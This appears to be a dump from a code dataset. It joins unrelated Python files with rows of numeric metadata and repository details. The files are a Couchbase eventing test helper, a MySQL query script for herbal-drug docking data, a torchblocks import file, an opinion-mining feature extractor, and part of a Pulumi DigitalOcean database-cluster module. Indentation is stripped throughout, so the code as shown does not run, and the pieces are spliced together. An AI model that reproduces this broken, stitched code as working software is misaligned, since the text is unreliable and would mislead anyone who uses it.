def resume_function(self,function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
### resume function
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = True
if "dcp_stream_boundary" in body['settings']:
body['settings'].pop('dcp_stream_boundary')
log.info("Settings after deleting dcp_stream_boundary : {0}".format(body['settings']))
self.rest.set_settings_for_function(body['appname'], body['settings'])
log.info("Resume Application : {0}".format(body['appname']))
self.wait_for_handler_state(body['appname'], "deployed")
def wait_for_handler_state(self, name,status,iterations=20):
self.sleep(20, message="Waiting for {} to {}...".format(name,status))
result = self.rest.get_composite_eventing_status()
count = 0
composite_status = None
while composite_status != status and count < iterations:
self.sleep(20,"Waiting for {} to {}...".format(name,status))
result = self.rest.get_composite_eventing_status()
for i in range(len(result['apps'])):
if result['apps'][i]['name'] == name:
composite_status = result['apps'][i]['composite_status']
count+=1
if count == iterations:
raise Exception('Eventing took lot of time for handler {} to {}'.format(name,status))
def _create_primary_index(self):
n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
n1ql_helper = N1QLHelper(shell=self.shell, max_verify=self.max_verify, buckets=self.buckets,
item_flag=self.item_flag, n1ql_port=self.n1ql_port,
full_docs_list=self.full_docs_list, log=self.log, input=self.input,
master=self.master, use_rest=True)
# primary index is required as we run some queries from handler code
n1ql_helper.create_primary_index(using_gsi=True, server=n1ql_node)
| 55.606509
| 119
| 0.691194
| 4,869
| 37,590
| 5.043541
| 0.057301
| 0.045445
| 0.062711
| 0.074276
| 0.841552
| 0.82282
| 0.810482
| 0.801238
| 0.789958
| 0.779045
| 0
| 0.015058
| 0.217345
| 37,590
| 676
| 120
| 55.606509
| 0.819647
| 0.088481
| 0
| 0.73743
| 0
| 0.001862
| 0.088901
| 0.011047
| 0
| 0
| 0
| 0
| 0.005587
| 1
| 0.039106
| false
| 0
| 0.096834
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67d03cf46cbeedac4fec6551e7b119e0d01bb6c8
| 7,130
|
py
|
Python
|
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
medicine/src/Result.py
|
marinajacks/reptilian
|
990cb371a551164828ad40e57df74ebdf5ebf25e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 13 20:24:45 2018
这个程序专门用来
@author: hello
"""
import pandas as pd
import pymysql
sql0='''
select a.*,b.*,c.*
from
(
select * from docked where scores is not null ORDER BY SCORES
)a
left join target b on a.pdbid =b.pdbid
left join
(select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid
)
c on a.pubchemcid=c.pubchemcid
where c.pubchemcid is not null
'''
sql='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores between 4.25 and 5
'''
sql1='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores between 5 and 7
'''
sql2='''
select *from (select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores ) a where scores>7
'''
sql3='''
select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc
) result
'''
sql4='''select * from tcmid;'''
sql5='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('龙血竭', drug);
'''
sql6='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('浙贝母', drug);
'''
sql7='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('三七', drug);
'''
sql8='''
select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a
where find_in_set('薏苡仁', drug);
'''
def test(sql,path):
conn = pymysql.connect(host='127.0.0.1',
user='root',password='',
db='ecnu',charset='utf8',
use_unicode=True)
df = pd.read_sql(sql5, con=conn)
print(df.head())
path='D:\MarinaJacks\project\\reptilian\medicine\对接数据\中药成分数据.xlsx'
df1 = pd.read_sql(sql6, con=conn)
df2 = pd.read_sql(sql7, con=conn)
df3 = pd.read_sql(sql8, con=conn)
writer = pd.ExcelWriter(path)
df.to_excel(excel_writer=writer,sheet_name='龙血竭')
df1.to_excel(excel_writer=writer,sheet_name='浙贝母')
df2.to_excel(excel_writer=writer,sheet_name='三七')
df3.to_excel(excel_writer=writer,sheet_name='薏苡仁')
writer.save()
writer.close()
if __name__=="__main__":
sql0='''
select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc;
'''
path="D:\MarinaJacks\project\\reptilian\medicine\对接数据\data6.xlsx"
sql1='''select * from (select distinct
pubchemcid ,drug,molecule from
(select c.molecule,c.pubchemcid,c.drug,b.uniprotid,b.protein,b.gene,b.pdbid,a.scores #a.*,b.*,c.*
from
(select * from docked where scores is not null ORDER BY SCORES )a
left join target b on a.pdbid =b.pdbid
left join (select pubchemcid,molecule,group_concat(distinct drug) as drug from druginfos group by pubchemcid)c
on a.pubchemcid=c.pubchemcid
where c.molecule is not null order by a.scores desc) result) a where '龙血竭' in (drug)
'''
test(sql1,path)
df=pd.read_excel('D:\MarinaJacks\project\\reptilian\medicine\对接数据\打分结果.xlsx',sheet_name='可视化分析')
| 38.75
| 119
| 0.649088
| 1,083
| 7,130
| 4.23084
| 0.111727
| 0.076822
| 0.043213
| 0.064164
| 0.879092
| 0.879092
| 0.870362
| 0.822348
| 0.822348
| 0.822348
| 0
| 0.009259
| 0.242637
| 7,130
| 184
| 120
| 38.75
| 0.839259
| 0.002945
| 0
| 0.611111
| 0
| 0.152778
| 0.853146
| 0.235762
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.006944
| 0.013889
| null | null | 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
67dbbe24bd6d01d7dde4d2b5b5091e9fd7d03b08
| 256
|
py
|
Python
|
torchblocks/models/nn/__init__.py
|
lonePatient/TorchBlocks
|
4a65d746cc8a396cb7df73ed4644d97ddf843e29
|
[
"MIT"
] | 82
|
2020-06-23T05:51:08.000Z
|
2022-03-29T08:11:08.000Z
|
torchblocks/models/nn/__init__.py
|
Raiselimit/TorchBlocks
|
a5baecb9a2470ff175087475630f2b7db3f7ef51
|
[
"MIT"
] | null | null | null |
torchblocks/models/nn/__init__.py
|
Raiselimit/TorchBlocks
|
a5baecb9a2470ff175087475630f2b7db3f7ef51
|
[
"MIT"
] | 22
|
2020-06-23T05:51:10.000Z
|
2022-03-18T07:01:43.000Z
|
from .bert_for_ner import *
from .bert_with_mdp import *
from .bert_for_multilabel import *
from .bert_for_siamese import *
from .bert_for_triple import BertForTripletNet
from .bert_for_attr import BertCRFForAttr
from .bert_for_relation import REBERT
| 36.571429
| 47
| 0.828125
| 38
| 256
| 5.210526
| 0.394737
| 0.282828
| 0.333333
| 0.257576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128906
| 256
| 7
| 48
| 36.571429
| 0.887892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1eeebc22e7fe20f6d1e19a51285e73163ed18c9
| 10,227
|
py
|
Python
|
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | 1
|
2015-05-13T20:38:12.000Z
|
2015-05-13T20:38:12.000Z
|
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | null | null | null |
scripts/extract_feats_relations.py
|
opener-project/opinion_miner_deluxe
|
ec73ca3a593648a23a66752392fd869ac65e363d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import sys
def write_to_output(my_class,feats, output):
my_str = my_class
for name, value in feats:
my_str += '\t'+name+'='+value
output.write(my_str.encode('utf-8')+'\n')
#########################################################################
# EXTRACTION OF FEATURES FOR TRAINING THE RELATION CLASSIFIER EXP --> TARGET
#########################################################################
# This function extracts features for the relation between expression adn target
# for the svm classifier
def extract_feats_exp_tar(exp_ids,tar_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True):
all_feats = []
data_for_token = {} # [token_id] -> (word, sentence_id)
for num_token, token_obj in enumerate(knaf_obj.get_tokens()):
word = token_obj.get_text()
s_id = token_obj.get_sent()
w_id = token_obj.get_id()
data_for_token[w_id] = (word,s_id,num_token)
# Loading data for terms
data_for_term = {} # [term_id] -> (lemma, span_token_ids)
for term in knaf_obj.get_terms():
termid = term.get_id()
lemma = term.get_lemma()
span = term.get_span()
span_token_ids = []
if span is not None:
span_token_ids = span.get_span_ids()
data_for_term[termid] = (lemma,span_token_ids)
sentence_for_exp = None
avg_position_exp = 0
n_toks = 0
for my_id in exp_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaExp',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_exp += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenExp',token))
if sentence_for_exp is None:
sentence_for_exp = sent_id
avg_position_exp = avg_position_exp * 1.0 / n_toks
#Lemmas for target
sentence_for_tar = None
avg_position_tar = 0
n_toks = 0
for my_id in tar_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaTar',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_tar += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenTar',token))
if sentence_for_tar is None:
sentence_for_tar = sent_id
avg_position_tar = avg_position_tar * 1.0 / n_toks
if use_dependencies:
dependency_extractor = knaf_obj.get_dependency_extractor()
if dependency_extractor is not None:
deps = dependency_extractor.get_shortest_path_spans(exp_ids,tar_ids)
if deps is not None:
all_feats.append(('deps-exp-tar','#'.join(deps)))
if sentence_for_exp is not None and sentence_for_tar is not None and sentence_for_exp == sentence_for_tar:
all_feats.append(('same_sentence','yes'))
else:
all_feats.append(('same_sentence','no'))
##Distance
dist = abs(avg_position_exp - avg_position_tar)
if dist <= 10:
my_dist = 'veryclose'
elif dist <=20:
my_dist = 'close'
elif dist <=25:
my_dist = 'far'
else:
my_dist = 'veryfar'
all_feats.append(('distExpTar',my_dist))
return all_feats
def create_rel_exp_tar_training(knaf_obj, output=sys.stdout, valid_opinions=None,use_dependencies=True,use_tokens=True, use_lemmas=True):
# Obtain pairs of features for Expression and Target
pairs = [] # [(Exp,Tar), (E,T), (E,T)....]
for opinion in knaf_obj.get_opinions():
opi_id = opinion.get_id()
opi_exp = opinion.get_expression()
exp_type = ''
exp_ids = []
if opi_exp is not None:
exp_type = opi_exp.get_polarity()
span = opi_exp.get_span()
if span is not None:
exp_ids = span.get_span_ids()
opi_tar = opinion.get_target()
tar_ids = []
if opi_tar is not None:
span = opi_tar.get_span()
if span is not None:
tar_ids = span.get_span_ids()
if valid_opinions is not None:
if exp_type not in valid_opinions:
continue ## This opinions will not be used
if len(tar_ids) != 0 and len(exp_ids) != 0:
pairs.append((exp_ids,tar_ids))
#extract_feats_exp_tar(exp_ids,tar_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True)
for idx1, (exp1, tar1) in enumerate(pairs):
feats_positive = extract_feats_exp_tar(exp1,tar1,knaf_obj,use_dependencies=use_dependencies, use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('+1', feats_positive, output)
for idx2, (exp2, tar2) in enumerate(pairs):
if idx1 != idx2:
feats_negative = extract_feats_exp_tar(exp1,tar2,knaf_obj,use_dependencies=use_dependencies, use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('-1', feats_negative, output)
def extract_feats_exp_hol(exp_ids,hol_ids,knaf_obj, use_lemmas=True, use_tokens=True, use_dependencies=True):
all_feats = []
data_for_token = {} # [token_id] -> (word, sentence_id)
for num_token, token_obj in enumerate(knaf_obj.get_tokens()):
word = token_obj.get_text()
s_id = token_obj.get_sent()
w_id = token_obj.get_id()
data_for_token[w_id] = (word,s_id,num_token)
# Loading data for terms
data_for_term = {} # [term_id] -> (lemma, span_token_ids)
for term in knaf_obj.get_terms():
termid = term.get_id()
lemma = term.get_lemma()
span = term.get_span()
span_token_ids = []
if span is not None:
span_token_ids = span.get_span_ids()
data_for_term[termid] = (lemma,span_token_ids)
sentence_for_exp = None
avg_position_exp = 0
n_toks = 0
for my_id in exp_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaExp',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_exp += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenExp',token))
if sentence_for_exp is None:
sentence_for_exp = sent_id
avg_position_exp = avg_position_exp * 1.0 / n_toks
#Lemmas for HOLDER
sentence_for_hol = None
avg_position_hol = 0
n_toks = 0
for my_id in hol_ids:
lemma, span_tok_ids = data_for_term[my_id]
if use_lemmas:
all_feats.append(('lemmaHol',lemma))
for tok_id in span_tok_ids:
token,sent_id,num_token = data_for_token[tok_id]
avg_position_hol += num_token
n_toks += 1
if use_tokens:
all_feats.append(('tokenHol',token))
if sentence_for_hol is None:
sentence_for_hol = sent_id
avg_position_hol = avg_position_hol * 1.0 / n_toks
if use_dependencies:
dependency_extractor = knaf_obj.get_dependency_extractor()
if dependency_extractor is not None:
deps = dependency_extractor.get_shortest_path_spans(exp_ids,hol_ids)
if deps is not None:
all_feats.append(('deps-exp-hol','#'.join(deps)))
if sentence_for_exp is not None and sentence_for_hol is not None and sentence_for_exp == sentence_for_hol:
all_feats.append(('same_sentence','yes'))
else:
all_feats.append(('same_sentence','no'))
##Distance
dist = abs(avg_position_exp - avg_position_hol)
if dist <= 10:
my_dist = 'veryclose'
elif dist <=20:
my_dist = 'close'
elif dist <=25:
my_dist = 'far'
else:
my_dist = 'veryfar'
all_feats.append(('distExpHol',my_dist))
#all_feats.append(('absDist',str(dist)))
return all_feats
def create_rel_exp_hol_training(knaf_obj, output=sys.stdout, valid_opinions=None,use_dependencies=True,use_tokens=True,use_lemmas=True):
# Obtain pairs of features for Expression and Holder
pairs = [] # [(Exp,Hol), (E,H), (E,H)....]
for opinion in knaf_obj.get_opinions():
opi_exp = opinion.get_expression()
exp_type = ''
exp_ids = []
if opi_exp is not None:
exp_type = opi_exp.get_polarity()
span = opi_exp.get_span()
if span is not None:
exp_ids = span.get_span_ids()
opi_hol = opinion.get_holder()
hol_ids = []
if opi_hol is not None:
span = opi_hol.get_span()
if span is not None:
hol_ids = span.get_span_ids()
if valid_opinions is not None:
if exp_type not in valid_opinions:
continue ## This opinions will not be used
if len(exp_ids) != 0 and len(hol_ids) != 0:
pairs.append((exp_ids,hol_ids))
#for feat_exp, feat_tar
for idx1, (expids1, tarids1) in enumerate(pairs):
feats_positive = extract_feats_exp_hol(expids1,tarids1,knaf_obj, use_dependencies=use_dependencies,use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('+1', feats_positive,output)
for idx2, (expids2, tarids2) in enumerate(pairs):
if idx1 != idx2:
feats_negative = extract_feats_exp_hol(expids1,tarids2,knaf_obj, use_dependencies=use_dependencies,use_tokens=use_tokens,use_lemmas=use_lemmas)
write_to_output('-1', feats_negative ,output)
| 34.550676
| 159
| 0.589811
| 1,372
| 10,227
| 4.044461
| 0.105685
| 0.030276
| 0.032438
| 0.011894
| 0.829699
| 0.817805
| 0.810236
| 0.802307
| 0.757434
| 0.744098
| 0
| 0.009172
| 0.30703
| 10,227
| 295
| 160
| 34.667797
| 0.773811
| 0.08194
| 0
| 0.702439
| 0
| 0
| 0.025825
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.004878
| 0
| 0.039024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1f5399b6d3fd985c884c869bc58d025e5ba7f8f
| 43,129
|
py
|
Python
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-04-25T14:43:12.000Z
|
2022-03-14T15:51:44.000Z
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 158
|
2019-04-15T21:47:18.000Z
|
2022-03-29T21:21:57.000Z
|
sdk/python/pulumi_digitalocean/database_cluster.py
|
pulumi/pulumi-digitalocean
|
b924205ec8f66f5240a755c91aa8642162038dfb
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-04-15T20:16:11.000Z
|
2021-05-28T19:08:32.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DatabaseClusterArgs', 'DatabaseCluster']
@pulumi.input_type
class DatabaseClusterArgs:
def __init__(__self__, *,
engine: pulumi.Input[str],
node_count: pulumi.Input[int],
region: pulumi.Input[Union[str, 'Region']],
size: pulumi.Input[Union[str, 'DatabaseSlug']],
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DatabaseCluster resource.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
pulumi.set(__self__, "engine", engine)
pulumi.set(__self__, "node_count", node_count)
pulumi.set(__self__, "region", region)
pulumi.set(__self__, "size", size)
if eviction_policy is not None:
pulumi.set(__self__, "eviction_policy", eviction_policy)
if maintenance_windows is not None:
pulumi.set(__self__, "maintenance_windows", maintenance_windows)
if name is not None:
pulumi.set(__self__, "name", name)
if private_network_uuid is not None:
pulumi.set(__self__, "private_network_uuid", private_network_uuid)
if sql_mode is not None:
pulumi.set(__self__, "sql_mode", sql_mode)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def engine(self) -> pulumi.Input[str]:
"""
Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: pulumi.Input[str]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> pulumi.Input[int]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@node_count.setter
def node_count(self, value: pulumi.Input[int]):
pulumi.set(self, "node_count", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[Union[str, 'Region']]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[Union[str, 'Region']]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> pulumi.Input[Union[str, 'DatabaseSlug']]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: pulumi.Input[Union[str, 'DatabaseSlug']]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> Optional[pulumi.Input[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@eviction_policy.setter
def eviction_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eviction_policy", value)
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@maintenance_windows.setter
def maintenance_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]):
pulumi.set(self, "maintenance_windows", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@private_network_uuid.setter
def private_network_uuid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_network_uuid", value)
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> Optional[pulumi.Input[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@sql_mode.setter
def sql_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_mode", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class _DatabaseClusterState:
def __init__(__self__, *,
cluster_urn: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
host: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
private_host: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
private_uri: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
uri: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DatabaseCluster resources.
:param pulumi.Input[str] cluster_urn: The uniform resource name of the database cluster.
:param pulumi.Input[str] database: Name of the cluster's default database.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[str] host: Database cluster's hostname.
:param pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] password: Password for the cluster's default user.
